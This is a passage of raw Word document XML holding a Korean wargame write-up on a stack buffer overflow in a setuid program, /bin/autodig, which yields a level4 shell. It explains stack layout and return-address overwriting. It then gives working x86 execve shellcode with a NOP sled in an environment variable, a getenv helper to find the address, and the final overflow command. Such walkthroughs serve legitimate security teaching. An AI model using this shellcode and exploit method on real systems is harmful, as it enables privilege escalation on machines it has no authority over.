      <w:r w:rsidRPr="008C2126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같은 중요한 부분을 다른 값으로 덮어씌우는 공격입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126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8C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126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8C2126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함수에서</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2126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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리턴주소</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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, 이전함수의 EBP주소, 인자로 넘겨진 값, 지역변수 같은 것들은 모두 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>스택에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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저장됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126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8C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126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스택은</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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LIFO(Last In First Out) 구조로서 그런 값들은 모두 순서대로 차곡차곡 저장됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126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857BC8" w:rsidRDefault="008C2126" w:rsidP="008C2126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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126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예를들어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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위 프로그램의 main 함수가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00564DF5">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리턴하기전</w:t>
      </w:r>
      <w:r w:rsidR="00564DF5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의</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>스택구조를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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살펴보면 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D53B3" w:rsidRDefault="008D53B3" w:rsidP="008C2126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8D53B3" w:rsidRDefault="00564DF5" w:rsidP="008C2126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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6429375" cy="1413950"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="그림 12" descr="3_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2_2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9704" cy="141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D9B" w:rsidRDefault="00F80D9B" w:rsidP="008C2126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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="spellStart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>gdb로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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main함수의 맨 처음 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ebp 부분에 break point를 걸면 SFP까지 쌓이는걸 확인할 수 있고</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00903DF4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마지막</w:t>
      </w:r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leave 바로 전에 break point를 걸면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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변수가 어떻게 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>쌓였는지까지</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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확인 가능합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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lastRenderedPageBreak/>
        <w:t>어쨌든</w:t>
      </w:r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, 소스코드 상으로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>볼때</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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함수로 먼저 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>에 "dig @" 가 들어가서 5byte를 먼저 차지합니다</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00903DF4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그리고</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>strcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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함수로 우리가 입력한 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>인자값인</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>[1] 이 그 뒤에 연결됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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그렇다면</w:t>
      </w:r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우리는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[1]에 119byte 크기의 값을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>넣어준다음</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00903DF4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마지막에</w:t>
      </w:r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우리가 원하는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>주소값</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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4byte를 넣어준다면 마지막 4byte는 원래의 return 주소를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>덮어쓰게됩니다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00903DF4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이런식으로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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우리가 원하는 주소로 함수의 흐름을 제어할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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해당</w:t>
      </w:r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프로그램에는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>가 걸려있으므로</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r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return주소에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>셸코드</w:t>
      </w:r>
      <w:r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가</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 xml:space="preserve"> 위치한</w:t>
      </w:r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주소를 넣어주면 우리는 main함수가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>리턴할때</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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level4 권한의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>셸을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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획득하게 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00903DF4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>=공격=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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그렇다면</w:t>
      </w:r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공격방법을 보여드리겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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버퍼</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 xml:space="preserve"> 공격</w:t>
      </w:r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에도 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>여러가지</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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방식이 있지만 일단 가장 간단한 환경변수를 이용한 방식을 사용하겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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어떤</w:t>
      </w:r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프로그램을 실행하면 우리가 따로 입력해주지 않아도 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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이전에 환경변수가 먼저 들어가게 됩니다</w:t>
      </w:r>
      <w:r w:rsidR="000426EB">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000426EB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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00903DF4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따라서</w:t>
      </w:r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환경변수에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>셸코드를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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올리면 프로그램상에 해당 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>셸코드가</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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위치하게 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="gramStart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lastRenderedPageBreak/>
        <w:t>1.환경변수</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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등록</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="gramStart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>export</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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SHELLCODE="`python -c 'print "\x90"*10000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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>SHELLCODE라는 이름의 환경변수를 등록하기 위해 위의 명령어를 입력합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="gramStart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>2.환경변수가</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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프로그램에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>올라갈때</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>주소값</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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알아내기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C81389" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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그</w:t>
      </w:r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다음, 이 환경변수가 프로그램에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>올라갈때</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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어떤 주소로 올라가는지 알아내기 위해</w:t>
      </w:r>
      <w:r w:rsidR="00C81389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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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vi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>getenv.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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명령어를 입력한 후 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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키를 눌러 수정모드로 들어간 뒤 아래 코드를 입력합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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>#include&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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main(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, char** </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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>"%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>s's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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address: %x\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>n",argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>[1],</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>getetnv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>[1]));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="gramStart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>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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다</w:t>
      </w:r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입력했으면 esc키를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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>누른다음</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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키를 누르고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>wq를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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입력하고 enter를 누릅니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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그</w:t>
      </w:r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다음 이 c코드를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>컴파일하기</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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위해 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>getenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>getenv.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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명령어를 입력합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="spellStart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>getenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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프로그램이 정상적으로 컴파일 됐다면, SHELLCODE환경변수의 주소를 알아내기 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>위해</w:t>
      </w:r>
      <w:r w:rsidR="001F3CB0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 xml:space="preserve"> </w:t>
      </w:r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>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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>getenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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SHELLCODE 명령어를 입력합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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그러면</w:t>
      </w:r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SHELLCODE의 주소가 나오는데, </w:t>
      </w:r>
      <w:r w:rsidR="001F3CB0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>이</w:t>
      </w:r>
      <w:r w:rsidR="001F3CB0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 xml:space="preserve">걸로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F3CB0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스택에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F3CB0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 xml:space="preserve"> 위치한 원래의</w:t>
      </w:r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return </w:t>
      </w:r>
      <w:r w:rsidR="001F3CB0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>주소</w:t>
      </w:r>
      <w:r w:rsidR="001F3CB0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를</w:t>
      </w:r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덮어씌우면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="gramStart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>3.최종</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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이제</w:t>
      </w:r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본격적인 공격 코드입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="001F3CB0" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>autodig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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`python -c 'print "A"*119 + "[SHELLCODE 주소]"'`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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SHELLCODE 주소는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>예를들어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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bfffd517 이라면 \x17\xd5\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>xbf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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식으로 넣어주면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00903DF4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리틀엔디안</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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형식으로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>넣어줘야하고</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A94009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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00903DF4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문자열</w:t>
      </w:r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형식을 이용해 해당 16진수들을 메모리에 바로 그 순서대로 입력되도록 하기 위해서 입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="003F4F57" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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이때</w:t>
      </w:r>
      <w:r w:rsidR="003F4F57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 xml:space="preserve"> </w:t>
      </w:r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>python script를 이용하는 이유는 그냥 바로 \x17\xd5\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>xbf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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입력하게 되면 \</w:t>
      </w:r>
      <w:r w:rsidR="003F4F57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,</w:t>
      </w:r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x</w:t>
      </w:r>
      <w:r w:rsidR="003F4F57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,</w:t>
      </w:r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1</w:t>
      </w:r>
      <w:r w:rsidR="003F4F57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,</w:t>
      </w:r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7</w:t>
      </w:r>
      <w:r w:rsidR="003F4F57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,</w:t>
      </w:r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\</w:t>
      </w:r>
      <w:r w:rsidR="003F4F57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,</w:t>
      </w:r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x</w:t>
      </w:r>
      <w:r w:rsidR="003F4F57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,</w:t>
      </w:r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d</w:t>
      </w:r>
      <w:r w:rsidR="003F4F57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,</w:t>
      </w:r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5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>이런식으로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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각 문자가 따로따로 입력되기 때문입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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공격코드를</w:t>
      </w:r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입력하면 level4 권한의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>셸이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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실행됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4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lastRenderedPageBreak/>
        <w:t>혹시</w:t>
      </w:r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위 과정까지 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>오류없이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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따라왔는데도 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>안된다면</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, SHELLCODE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>주소값을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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조금씩 증가시켜서 입력해보길 바랍니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="00903DF4" w:rsidP="00903DF4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903DF4" w:rsidRPr="00903DF4" w:rsidRDefault="003F4F57" w:rsidP="00903DF4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 xml:space="preserve">우리가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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쉘코드를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 xml:space="preserve"> 환경변수에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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등록할때</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00903DF4"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앞에 NOP썰매라는 것을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00903DF4"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>넣어줬기때문에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00903DF4"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정확히 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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쉘</w:t>
      </w:r>
      <w:r w:rsidR="00903DF4"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>을</w:t>
      </w:r>
